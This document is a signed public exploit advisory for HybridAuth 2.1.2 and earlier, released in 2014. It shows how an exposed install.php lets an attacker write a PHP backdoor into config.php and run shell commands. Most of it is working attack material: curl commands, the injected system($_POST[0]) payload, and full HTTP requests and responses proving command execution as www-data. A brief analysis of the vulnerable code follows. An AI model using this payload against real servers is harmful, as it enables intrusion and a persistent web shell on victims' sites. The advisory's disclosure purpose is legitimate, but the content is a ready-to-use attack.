HybridAuth 2.1.2 Remote Code Execution

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
  
######################################################################  
# _ ___ _ _ ____ ____ _ _____  
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|  
# | | | | | | \| | | _| | / _ \ | |  
# | |__| |_| | |\ | |_| | |___ / ___ \| |  
# |_____\___/|_| \_|\____|\____/_/ \_\_|  
#  
# HybridAuth <= 2.1.2 Remote Code Execution  
# Website : http://hybridauth.sourceforge.net/  
# Exploit Author : @u0x (Pichaya Morimoto)  
# Release dates : August 5, 2014  
#  
# Special Thanks to 2600 Thailand group  
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/  
#  
########################################################################  
  
[+] Description  
============================================================  
HybridAuth enable developers to easily build social applications to engage  
websites  
vistors and customers on a social level by implementing social signin,  
social sharing,  
users profiles, friends list, activities stream, status updates and more.  
  
  
[+] Exploit  
============================================================  
The default installation leave "install.php" untouched.  
$ curl http://victim/hybridauth/install.php -d  
'GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*'  
$ curl http://victim/hybridauth/config.php -d '0=id;ls -lha'  
  
  
[+] Proof-of-Concept  
============================================================  
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7  
  
Download :  
http://sourceforge.net/projects/hybridauth/files/hybridauth-2.1.2.zip/download  
  
1. Inject Evil PHP Backdoor  
POST /hybridauth/install.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: th,en-us;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 51  
  
GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*  
  
HTTP/1.1 200 OK  
Date: Mon, 04 Aug 2014 18:53:36 GMT  
Server: Apache  
X-Powered-By: PHP/5.5.9-1ubuntu4.3  
Vary: Accept-Encoding  
X-Content-Type-Options: nosniff  
X-Frame-Options: sameorigin  
Content-Length: 2437  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
<html>  
<head>  
<title>HybridAuth Installer</title>  
...  
  
2. Gaining access to the PHP backdoor  
POST /hybridauth/config.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: th,en-us;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 14  
  
0=id;ls%20-lha  
  
HTTP/1.1 200 OK  
Date: Mon, 04 Aug 2014 18:54:56 GMT  
Server: Apache  
X-Powered-By: PHP/5.5.9-1ubuntu4.3  
Vary: Accept-Encoding  
X-Content-Type-Options: nosniff  
X-Frame-Options: sameorigin  
Content-Length: 403  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
total 40K  
drwxrwxr-x 3 longcat longcat 4.0K Feb 15 2013 .  
drwxr-xr-x 4 longcat www-data 4.0K Aug 5 01:14 ..  
drwxrwxr-x 5 longcat longcat 4.0K Feb 15 2013 Hybrid  
- -rw-rw-r-- 1 www-data www-data 2.5K Aug 5 01:53 config.php  
- -rw-rw-r-- 1 longcat longcat 488 Feb 15 2013 index.php  
- -rw-rw-r-- 1 longcat longcat 18K Feb 16 2013 install.php  
  
  
[+] Vulnerability Analysis  
============================================================  
  
Filename: ./install.php  
...  
if( count( $_POST ) ): <-- user controlled input HTTP POST data  
\/-- Read a template file  
$CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl"  
);  
  
foreach( $_POST AS $k => $v ):  
$v = strip_tags( $v );  
$z = "#$k#";  
  
\/-- #POST data's keys# found in template file will be replaced  
with POST data's values  
| so we can simply replace these existing values with something  
fun :)  
$CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );  
endforeach;  
...  
\/-- upload that replaced template contents into config.php  
$is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE .  
"config.php", $CONFIG_TEMPLATE );  
...  
  
Filename: ./Hybrid/resources/config.php.tpl  
...  
return  
array(  
"base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#", <-- #..# will be  
replaced with arbitrary PHP code  
...  
  
So this is what injected "config.php" looks like...  
Filename: ./config.php  
<?php  
...  
return  
array(  
"base_url" => "".system($_POST[0]));/*",  
  
"providers" => array (  
// openid providers  
"OpenID" => array (  
"enabled" => #OPENID_ADAPTER_STATUS#  
),  
...  
  
  
Happy Pwning ;)  
LongCat  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCgAGBQJT39trAAoJEB2kHapd1XMUvFcP/je2VBLG4wDR1W2HIYCVmFOw  
7WCYw+bWwDlf3rJsOJd/gQXIGIdgfGXP5nKE6nbvQ6N5a3ucHgArcjonP4kcMzTi  
wNgx01wdz0YkuZOoWqMz76VWjhNt+jfLm2rG2ihro8P1wvAX8/UOlOhmWXA0loeV  
pqoFeXvA5cC3lKQ8qnZiTlNepIDvoCbfo7EDpFWv+lCh23GoZsawdZ4MOg/l/D/Y  
qfCCGtcyaYC2qQAHTqaim0zLF6jUEto0+Y3+3Lxi3G9JdCYGWGWrX83L5ziVIEJI  
ANvaJEZF+JMzzS/RHufSMngld9IXGvDv/ZVMgn0ONH3bk2o9I19Nb/HT2DKnRSCh  
1pIXWdQwnDuAM8z7ZhDakTusWlR2RiPM6YuPLUnyJHlx4PH2BnLlwVKZlNbcl97A  
9qnbrUTmlivJx+Bh6HjU6TS5AN3ETVEngEG/vEkCmbEWvJyMpXppSq6a/gejDNx7  
N57fqw+Vz/cWQVk7BaHK9KYQ3SnEJwdDFkCctlv13Ckd2UuOfAi1qwfZ7n6S0JgD  
oVO64SpYkeodOSJ59YX9vNn/gSYLjayNKINHWhJvtVXanYHrJzZY9Orjzf5pAl3+  
WOGYjuf4pPJY2XNjAE4AQ68g2Csl3cqLdbHe1yRVrPmzK1ZMQC/tjcgiB6XZObxe  
kAPY+EmH3MxZ/qeob16k  
=10bM  
-----END PGP SIGNATURE-----  
  
  
`